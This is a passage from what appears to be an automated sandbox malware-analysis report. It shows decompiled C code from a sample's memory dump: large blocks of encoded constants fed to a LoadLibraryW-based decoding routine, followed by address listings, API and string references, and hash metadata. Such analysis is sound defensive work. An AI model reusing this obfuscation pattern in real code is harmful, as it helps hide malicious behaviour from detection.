				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
				intOrPtr _v408;
				intOrPtr _v412;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				intOrPtr _v440;
				intOrPtr _v444;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				intOrPtr _v476;
				intOrPtr _v480;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				char _v1428;

				_v1428 = 0x35afd9ed;
				_v1424 = 0xb2bb3fd1;
				_v1420 = 0xc54e001f;
				_v1416 = 0x464bd289;
				_v1412 = 0xa62e3cd5;
				_v1408 = 0x10828f30;
				_v1404 = 0xd759c3e6;
				_v1400 = 0x3226a1eb;
				_v1396 = 0x93d3719f;
				_v1392 = 0xff1d7368;
				_v1388 = 0x4cf80263;
				_v1384 = 0x1220b21a;
				_v1380 = 0x9e299973;
				_v1376 = 0x8c93726d;
				_v1372 = 0x388d0cca;
				_v1368 = 0x63dd4a40;
				_v1364 = 0x63312a98;
				_v1360 = 0xc54ade8b;
				_v1356 = 0x57b31f78;
				_v1352 = 0xbaef0446;
				_v1348 = 0xa5fb8b92;
				_v1344 = 0x7ac55a38;
				_v1340 = 0xa13c21f;
				_v1336 = 0x77bc5b0d;
				_v1332 = 0x6b48a641;
				_v1328 = 0xc939f5fe;
				_v1324 = 0xf80f5b16;
				_v1320 = 0xc75ec705;
				_v1316 = 0xdba5663;
				_v1312 = 0x4213a67f;
				_v1308 = 0x3de4493c;
				_v1304 = 0xd6231f80;
				_v1300 = 0x68067b7;
				_v1296 = 0xc082ec40;
				_v1292 = 0xa5d2a512;
				_v1288 = 0x5f226fcb;
				_v1284 = 0x9a62d466;
				_v1280 = 0x2dcc9250;
				_v1276 = 0x68432153;
				_v1272 = 0xe57fc7e;
				_v1268 = 0xf9c65141;
				_v1264 = 0x74e9465;
				_v1260 = 0xa6dac4aa;
				_v1256 = 0x35a3c1f;
				_v1252 = 0xa3662753;
				_v1248 = 0xf78554cb;
				_v1244 = 0xa9ba3f97;
				_v1240 = 0xa7034e35;
				_v1236 = 0xfefc68e9;
				_v1232 = 0xf512b31a;
				_v1228 = 0x7483c20;
				_v1224 = 0x36b5f632;
				_v1220 = 0x38c31e64;
				_v1216 = 0x4c62f726;
				_v1212 = 0x99ba6132;
				_v1208 = 0x323bd5bb;
				_v1204 = 0xd06b8129;
				_v1200 = 0x58ac925d;
				_v1196 = 0x14258239;
				_v1192 = 0x74c7fcd7;
				_v1188 = 0x5b658ef1;
				_v1184 = 0xfef3ed92;
				_v1180 = 0xd6897bdd;
				_v1176 = 0xe3ae805d;
				_v1172 = 0xd7dd3c6a;
				_v1168 = 0xcf62f53e;
				_v1164 = 0x10086fbc;
				_v1160 = 0xb950e66;
				_v1156 = 0x1f978099;
				_v1152 = 0xa5187c45;
				_v1148 = 0xe4f386b;
				_v1144 = 0xa997fe6d;
				_v1140 = 0x39d08a92;
				_v1136 = 0xfb10c42f;
				_v1132 = 0x58d93c66;
				_v1128 = 0x4cf30038;
				_v1124 = 0xa31aa9f3;
				_v1120 = 0xa932cf52;
				_v1116 = 0x2451a583;
				_v1112 = 0xeb831842;
				_v1108 = 0x59b79230;
				_v1104 = 0x47744230;
				_v1100 = 0xd450fcea;
				_v1096 = 0x1959a718;
				_v1092 = 0x6585da84;
				_v1088 = 0xf7b8a766;
				_v1084 = 0xa8e739d6;
				_v1080 = 0x25491a58;
				_v1076 = 0x41855178;
				_v1072 = 0xae9aad57;
				_v1068 = 0x913a6b1b;
				_v1064 = 0xf5bfdaf1;
				_v1060 = 0xe0413efd;
				_v1056 = 0x2a6692be;
				_v1052 = 0xae364f54;
				_v1048 = 0xa4910d06;
				_v1044 = 0xac37d2e2;
				_v1040 = 0x1f0ed562;
				_v1036 = 0xf8313c8;
				_v1032 = 0x1696917a;
				_v1028 = 0x4ba4c9c6;
				_v1024 = 0xca70992d;
				_v1020 = 0x88f129d4;
				_v1016 = 0x8986dfc9;
				_v1012 = 0x8077495d;
				_v1008 = 0x7f188a07;
				_v1004 = 0x7068997b;
				_v1000 = 0x5f73f18e;
				_v996 = 0x7079116d;
				_v992 = 0xf12893f0;
				_v988 = 0x2e1e137f;
				_v984 = 0x9c8a1308;
				_v980 = 0x63f7f786;
				_v976 = 0x82df7bd;
				_v972 = 0xb3225a87;
				_v968 = 0xd1bde73d;
				_v964 = 0x59885592;
				_v960 = 0xc427fd32;
				_v956 = 0x9d169c5c;
				_v952 = 0x6e01ebf2;
				_v948 = 0x9c5f68a9;
				_v944 = 0x559de137;
				_v940 = 0x45953cbd;
				_v936 = 0xd84853c;
				_v932 = 0x65edd287;
				_v928 = 0xef673b85;
				_v924 = 0x7fa3edf8;
				_v920 = 0x83ba664c;
				_v916 = 0xac287487;
				_v912 = 0x4d8c6e16;
				_v908 = 0xd6774e7a;
				_v904 = 0x6a742a14;
				_v900 = 0x7b41d554;
				_v896 = 0x3583a68f;
				_v892 = 0xb64620eb;
				_v888 = 0x968e295c;
				_v884 = 0x1f2a9f33;
				_v880 = 0x20c95888;
				_v876 = 0x3ad04588;
				_v872 = 0x1f3f3349;
				_v868 = 0x8bc63238;
				_v864 = 0x72dfdb8b;
				_v860 = 0x3c084d40;
				_v856 = 0xa03b21f2;
				_v852 = 0x975b711;
				_v848 = 0x66143377;
				_v844 = 0xb0ef4486;
				_v840 = 0x9536b870;
				_v836 = 0xad0c8488;
				_v832 = 0xfa93b301;
				_v828 = 0x625273d4;
				_v824 = 0x2130da0b;
				_v820 = 0x21682fc7;
				_v816 = 0x125bacd0;
				_v812 = 0x8d655941;
				_v808 = 0x7ea7e90a;
				_v804 = 0x998bb919;
				_v800 = 0x4a680a7;
				_v796 = 0x4dc5c9aa;
				_v792 = 0x6f4d8b33;
				_v788 = 0xfff2694d;
				_v784 = 0x7ad03f4c;
				_v780 = 0xec728f7e;
				_v776 = 0xbd5f0efc;
				_v772 = 0x39972492;
				_v768 = 0x8a22d400;
				_v764 = 0xc9e812c9;
				_v760 = 0xd9c8e7;
				_v756 = 0x783a029e;
				_v752 = 0xf55a1b2b;
				_v748 = 0x39a441d8;
				_v744 = 0xfddcd3b7;
				_v740 = 0xa8d3ee78;
				_v736 = 0xb71d00d8;
				_v732 = 0xd8f1a5e0;
				_v728 = 0x171f9db;
				_v724 = 0x608a96cb;
				_v720 = 0x5db98275;
				_v716 = 0x8e64ca5b;
				_v712 = 0x8224c5bb;
				_v708 = 0xf3e18a45;
				_v704 = 0x9fa69ab2;
				_v700 = 0x9858a1cb;
				_v696 = 0x20254080;
				_v692 = 0xc5a28d75;
				_v688 = 0xa7e533b4;
				_v684 = 0xb3f2eb4f;
				_v680 = 0xf3eab420;
				_v676 = 0xe26b573a;
				_v672 = 0x36939b06;
				_v668 = 0xce10ed67;
				_v664 = 0xaa9683c0;
				_v660 = 0x62293a60;
				_v656 = 0x1d84933a;
				_v652 = 0xad1d5e99;
				_v648 = 0x85c61e4e;
				_v644 = 0x5b995538;
				_v640 = 0x8d8b2cb;
				_v636 = 0xa9e61fda;
				_v632 = 0x9cd95a2d;
				_v628 = 0x8a651418;
				_v624 = 0x98b050c0;
				_v620 = 0x40e286e5;
				_v616 = 0x1619f260;
				_v612 = 0xb4bdd31f;
				_v608 = 0xb99d071c;
				_v604 = 0x125c63d2;
				_v600 = 0x2b37c664;
				_v596 = 0x82586a06;
				_v592 = 0x68bb79f8;
				_v588 = 0xde917f5e;
				_v584 = 0x13cb2094;
				_v580 = 0x4e37c720;
				_v576 = 0x6a7f746d;
				_v572 = 0xd082913f;
				_v568 = 0xbf74de13;
				_v564 = 0xa80f39b0;
				_v560 = 0xd992575e;
				_v556 = 0x68739177;
				_v552 = 0x3f37384b;
				_v548 = 0x18bc988d;
				_v544 = 0x46cd9d63;
				_v540 = 0xf4719ae3;
				_v536 = 0xf64f55e0;
				_v532 = 0x87d9f1a7;
				_v528 = 0x8f398c60;
				_v524 = 0x8cb94234;
				_v520 = 0xbbea7dd7;
				_v516 = 0xb9b8b1df;
				_v512 = 0xaa28a9fc;
				_v508 = 0xf0af87ff;
				_v504 = 0x8dd7ca67;
				_v500 = 0xe2b550c4;
				_v496 = 0xd32bc033;
				_v492 = 0x948a965f;
				_v488 = 0x8851f930;
				_v484 = 0x8f5ccc1;
				_v480 = 0x6164f669;
				_v476 = 0x33510924;
				_v472 = 0xcb43e698;
				_v468 = 0x6ce52a33;
				_v464 = 0xa66f015c;
				_v460 = 0x7718680d;
				_v456 = 0x9d1df3bc;
				_v452 = 0x2a00c920;
				_v448 = 0x91fb3000;
				_v444 = 0x10c81bc3;
				_v440 = 0xf8a75bf2;
				_v436 = 0x5ae0234a;
				_v432 = 0xf98cf7ec;
				_v428 = 0x5fc46df;
				_v424 = 0xca1b041b;
				_v420 = 0x2790b2c6;
				_v416 = 0x54daa301;
				_v412 = 0x138923a3;
				_v408 = 0x301c0cdf;
				_v404 = 0x38e0a856;
				_v400 = 0xf03451b0;
				_v396 = 0x99e431f5;
				_v392 = 0x11281ac6;
				_v388 = 0xcf2342ab;
				_v384 = 0x9eab3b39;
				_v380 = 0x9ae3e3f1;
				_v376 = 0x1a6c98f3;
				_v372 = 0x68813b1b;
				_v368 = 0x192d795a;
				_v364 = 0x40d247a5;
				_v360 = 0x72cd97b3;
				_v356 = 0x67b5cebb;
				_v352 = 0x72e3ccbf;
				_v348 = 0x6f4c2d5b;
				_v344 = 0x9e6a8356;
				_v340 = 0x49e92bba;
				_v336 = 0x4f743d77;
				_v332 = 0x153393e1;
				_v328 = 0x13614add;
				_v324 = 0x69ce03ee;
				_v320 = 0x854a7485;
				_v316 = 0x3d8d4e01;
				_v312 = 0x326ab68;
				_v308 = 0x1099a027;
				_v304 = 0xf0ad3f63;
				_v300 = 0xef67c339;
				_v296 = 0x48f2e773;
				_v292 = 0x20c73ca2;
				_v288 = 0x3ce286cb;
				_v284 = 0xc256b288;
				_v280 = 0x5313123f;
				_v276 = 0x298713bc;
				_v272 = 0xa00fff1e;
				_v268 = 0x712c154;
				_v264 = 0x8dfdabca;
				_v260 = 0x1b118de3;
				_v256 = 0x41128fd1;
				_v252 = 0x6de2b7e3;
				_v248 = 0x5024cd33;
				_v244 = 0x6abdc573;
				_v240 = 0x1c49177e;
				_v236 = 0x21386a4d;
				_v232 = 0x93f5651f;
				_v228 = 0xc73e8d48;
				_v224 = 0x3cac36f9;
				_v220 = 0x2d121512;
				_v216 = 0xa1b212f1;
				_v212 = 0x9129c71a;
				_v208 = 0x4db0cfdf;
				_v204 = 0xd654f2c6;
				_v200 = 0x16901ffd;
				_v196 = 0x81f89533;
				_v192 = 0x1b05c4c7;
				_v188 = 0x5eca920e;
				_v184 = 0x7724293;
				_v180 = 0x500c8610;
				_v176 = 0x55e5490d;
				_v172 = 0x62084e15;
				_v168 = 0xcf1eef0a;
				_v164 = 0xc774a676;
				_v160 = 0xae26a56e;
				_v156 = 0xcd297ae8;
				_v152 = 0x4142669a;
				_v148 = 0x7a1cc234;
				_v144 = 0x9b8e60b1;
				_v140 = 0xb4c16bb9;
				_v136 = 0x346d9962;
				_v132 = 0x84307aeb;
				_v128 = 0x7110f065;
				_v124 = 0x6a478088;
				_v120 = 0x5dc95d88;
				_v116 = 0x7073454d;
				_v112 = 0xacd929e4;
				_v108 = 0xde22b221;
				_v104 = 0x16e6327;
				_v100 = 0x9149dc8;
				_v96 = 0xe2880d33;
				_v92 = 0x2b179b1c;
				_v88 = 0xdea65404;
				_v84 = 0xf8875bcd;
				_v80 = 0x4b33baa9;
				_v76 = 0xb8f51a63;
				_v72 = 0x100f3977;
				_v68 = 0x86e5080f;
				_v64 = 0x39c92f99;
				_v60 = 0xd5b96d4e;
				_v56 = 0x4c99974;
				_v52 = 0x32225531;
				_v48 = 0xe94abe7a;
				_v44 = 0x45a4729;
				_v40 = 0xe5478378;
				_v36 = 0x67de8f40;
				_v32 = 0x9ef8aa84;
				_v28 = 0xb07d4bc5;
				_v24 = 0xa2696d4;
				_v20 = 0x57bd9265;
				_v16 = 0x5cb55045;
				_v12 = 0x686aeb99;
				_v8 = 0xd8fb779c;
				_t367 = E00401A52(0x412830, 0x72fc3a35);
				 *0x416500 = LoadLibraryW(_t358);
				L00401B09(_t367);
				_push(0x415f50);
				_push(0x15bf801c);
				return E004012FF( *0x416500,  &_v1428, 0x164);
			}







































































































































































































































































































































































                  0x0040b6bf
                  0x0040b6c9
                  0x0040b6d3
                  0x0040b6dd
                  0x0040b6e7
                  0x0040b6f1
                  0x0040b6fb
                  0x0040b705
                  0x0040b70f
                  0x0040b719
                  0x0040b723
                  0x0040b72d
                  0x0040b737
                  0x0040b741
                  0x0040b74b
                  0x0040b755
                  0x0040b75f
                  0x0040b769
                  0x0040b773
                  0x0040b77d
                  0x0040b787
                  0x0040b791
                  0x0040b79b
                  0x0040b7a5
                  0x0040b7af
                  0x0040b7b9
                  0x0040b7c3
                  0x0040b7cd
                  0x0040b7d7
                  0x0040b7e1
                  0x0040b7eb
                  0x0040b7f5
                  0x0040b7ff
                  0x0040b809
                  0x0040b813
                  0x0040b81d
                  0x0040b827
                  0x0040b831
                  0x0040b83b
                  0x0040b845
                  0x0040b84f
                  0x0040b859
                  0x0040b863
                  0x0040b86d
                  0x0040b877
                  0x0040b881
                  0x0040b88b
                  0x0040b895
                  0x0040b89f
                  0x0040b8a9
                  0x0040b8b3
                  0x0040b8bd
                  0x0040b8c7
                  0x0040b8d1
                  0x0040b8db
                  0x0040b8e5
                  0x0040b8ef
                  0x0040b8f9
                  0x0040b903
                  0x0040b90d
                  0x0040b917
                  0x0040b921
                  0x0040b92b
                  0x0040b935
                  0x0040b93f
                  0x0040b949
                  0x0040b953
                  0x0040b95d
                  0x0040b967
                  0x0040b971
                  0x0040b97b
                  0x0040b985
                  0x0040b98f
                  0x0040b999
                  0x0040b9a3
                  0x0040b9ad
                  0x0040b9b7
                  0x0040b9c1
                  0x0040b9cb
                  0x0040b9d5
                  0x0040b9df
                  0x0040b9e9
                  0x0040b9f3
                  0x0040b9fd
                  0x0040ba07
                  0x0040ba11
                  0x0040ba1b
                  0x0040ba25
                  0x0040ba2f
                  0x0040ba39
                  0x0040ba43
                  0x0040ba4d
                  0x0040ba57
                  0x0040ba61
                  0x0040ba6b
                  0x0040ba75
                  0x0040ba7f
                  0x0040ba89
                  0x0040ba93
                  0x0040ba9d
                  0x0040baa7
                  0x0040bab1
                  0x0040babb
                  0x0040bac5
                  0x0040bacf
                  0x0040bad9
                  0x0040bae3
                  0x0040baed
                  0x0040baf7
                  0x0040bb01
                  0x0040bb0b
                  0x0040bb15
                  0x0040bb1f
                  0x0040bb29
                  0x0040bb33
                  0x0040bb3d
                  0x0040bb47
                  0x0040bb51
                  0x0040bb5b
                  0x0040bb65
                  0x0040bb6f
                  0x0040bb79
                  0x0040bb83
                  0x0040bb8d
                  0x0040bb97
                  0x0040bba1
                  0x0040bbab
                  0x0040bbb5
                  0x0040bbbf
                  0x0040bbc9
                  0x0040bbd3
                  0x0040bbdd
                  0x0040bbe7
                  0x0040bbf1
                  0x0040bbfb
                  0x0040bc05
                  0x0040bc0f
                  0x0040bc19
                  0x0040bc23
                  0x0040bc2d
                  0x0040bc37
                  0x0040bc41
                  0x0040bc4b
                  0x0040bc55
                  0x0040bc5f
                  0x0040bc69
                  0x0040bc73
                  0x0040bc7d
                  0x0040bc87
                  0x0040bc91
                  0x0040bc9b
                  0x0040bca5
                  0x0040bcaf
                  0x0040bcb9
                  0x0040bcc3
                  0x0040bccd
                  0x0040bcd7
                  0x0040bce1
                  0x0040bceb
                  0x0040bcf5
                  0x0040bcff
                  0x0040bd09
                  0x0040bd13
                  0x0040bd1d
                  0x0040bd27
                  0x0040bd31
                  0x0040bd3b
                  0x0040bd45
                  0x0040bd4f
                  0x0040bd59
                  0x0040bd63
                  0x0040bd6d
                  0x0040bd77
                  0x0040bd81
                  0x0040bd8b
                  0x0040bd95
                  0x0040bd9f
                  0x0040bda9
                  0x0040bdb3
                  0x0040bdbd
                  0x0040bdc7
                  0x0040bdd1
                  0x0040bddb
                  0x0040bde5
                  0x0040bdef
                  0x0040bdf9
                  0x0040be03
                  0x0040be0d
                  0x0040be17
                  0x0040be21
                  0x0040be2b
                  0x0040be35
                  0x0040be3f
                  0x0040be49
                  0x0040be53
                  0x0040be5d
                  0x0040be67
                  0x0040be71
                  0x0040be7b
                  0x0040be85
                  0x0040be8f
                  0x0040be99
                  0x0040bea3
                  0x0040bead
                  0x0040beb7
                  0x0040bec1
                  0x0040becb
                  0x0040bed5
                  0x0040bedf
                  0x0040bee9
                  0x0040bef3
                  0x0040befd
                  0x0040bf07
                  0x0040bf11
                  0x0040bf1b
                  0x0040bf25
                  0x0040bf2f
                  0x0040bf39
                  0x0040bf43
                  0x0040bf4d
                  0x0040bf57
                  0x0040bf61
                  0x0040bf6b
                  0x0040bf75
                  0x0040bf7f
                  0x0040bf89
                  0x0040bf93
                  0x0040bf9d
                  0x0040bfa7
                  0x0040bfb1
                  0x0040bfbb
                  0x0040bfc5
                  0x0040bfcf
                  0x0040bfd9
                  0x0040bfe3
                  0x0040bfed
                  0x0040bff7
                  0x0040c001
                  0x0040c00b
                  0x0040c015
                  0x0040c01f
                  0x0040c029
                  0x0040c033
                  0x0040c03d
                  0x0040c047
                  0x0040c051
                  0x0040c05b
                  0x0040c065
                  0x0040c06f
                  0x0040c079
                  0x0040c083
                  0x0040c08d
                  0x0040c097
                  0x0040c0a1
                  0x0040c0ab
                  0x0040c0b5
                  0x0040c0bf
                  0x0040c0c9
                  0x0040c0d3
                  0x0040c0dd
                  0x0040c0e7
                  0x0040c0f1
                  0x0040c0fb
                  0x0040c105
                  0x0040c10f
                  0x0040c119
                  0x0040c123
                  0x0040c12d
                  0x0040c137
                  0x0040c141
                  0x0040c14b
                  0x0040c155
                  0x0040c15f
                  0x0040c169
                  0x0040c173
                  0x0040c17d
                  0x0040c187
                  0x0040c191
                  0x0040c19b
                  0x0040c1a5
                  0x0040c1af
                  0x0040c1b9
                  0x0040c1c3
                  0x0040c1cd
                  0x0040c1d7
                  0x0040c1e1
                  0x0040c1eb
                  0x0040c1f5
                  0x0040c1ff
                  0x0040c209
                  0x0040c213
                  0x0040c21d
                  0x0040c227
                  0x0040c231
                  0x0040c23b
                  0x0040c245
                  0x0040c24f
                  0x0040c259
                  0x0040c263
                  0x0040c26d
                  0x0040c277
                  0x0040c281
                  0x0040c28b
                  0x0040c295
                  0x0040c29f
                  0x0040c2a9
                  0x0040c2b3
                  0x0040c2bd
                  0x0040c2c7
                  0x0040c2d1
                  0x0040c2db
                  0x0040c2e5
                  0x0040c2ef
                  0x0040c2f9
                  0x0040c303
                  0x0040c30d
                  0x0040c317
                  0x0040c321
                  0x0040c32b
                  0x0040c335
                  0x0040c33f
                  0x0040c349
                  0x0040c353
                  0x0040c362
                  0x0040c371
                  0x0040c378
                  0x0040c37f
                  0x0040c386
                  0x0040c38d
                  0x0040c394
                  0x0040c39b
                  0x0040c3a2
                  0x0040c3a9
                  0x0040c3b0
                  0x0040c3b7
                  0x0040c3be
                  0x0040c3c5
                  0x0040c3cc
                  0x0040c3d3
                  0x0040c3da
                  0x0040c3e1
                  0x0040c3e8
                  0x0040c3ef
                  0x0040c3f6
                  0x0040c3fd
                  0x0040c404
                  0x0040c40b
                  0x0040c412
                  0x0040c419
                  0x0040c420
                  0x0040c427
                  0x0040c42e
                  0x0040c435
                  0x0040c43c
                  0x0040c443
                  0x0040c44a
                  0x0040c456
                  0x0040c461
                  0x0040c466
                  0x0040c477
                  0x0040c47c
                  0x0040c492

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040C459
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: IU$$Q3$0BtG$1U"2$3*l$8$:Wk$<I=$J#Z$K87?$MEsp$Mj8!$S!Ch$[-Lo$`:)b$w=tO
                  • API String ID: 1029625771-1041004230
                  • Opcode ID: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction ID: 9a6b7aac7a66a4a18d8d0bcd4942d35e4a44c5d677b151ec7ad78da889033333
                  • Opcode Fuzzy Hash: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction Fuzzy Hash: FD52A5F48567698BDB618F459E897CEBA74BB11304FA096C8C25D3B214CB740BC6CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00409BFD, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 199libraryUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 549 409bfd-40a2c8 call 401a52 LoadLibraryW call 401b09 call 4012ff
                  C-Code - Quality: 82%
                  			E00409BFD(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				intOrPtr _v352;
				intOrPtr _v356;
				intOrPtr _v360;
				intOrPtr _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				intOrPtr _v376;
				intOrPtr _v380;
				intOrPtr _v384;
				intOrPtr _v388;
				intOrPtr _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				intOrPtr _v404;
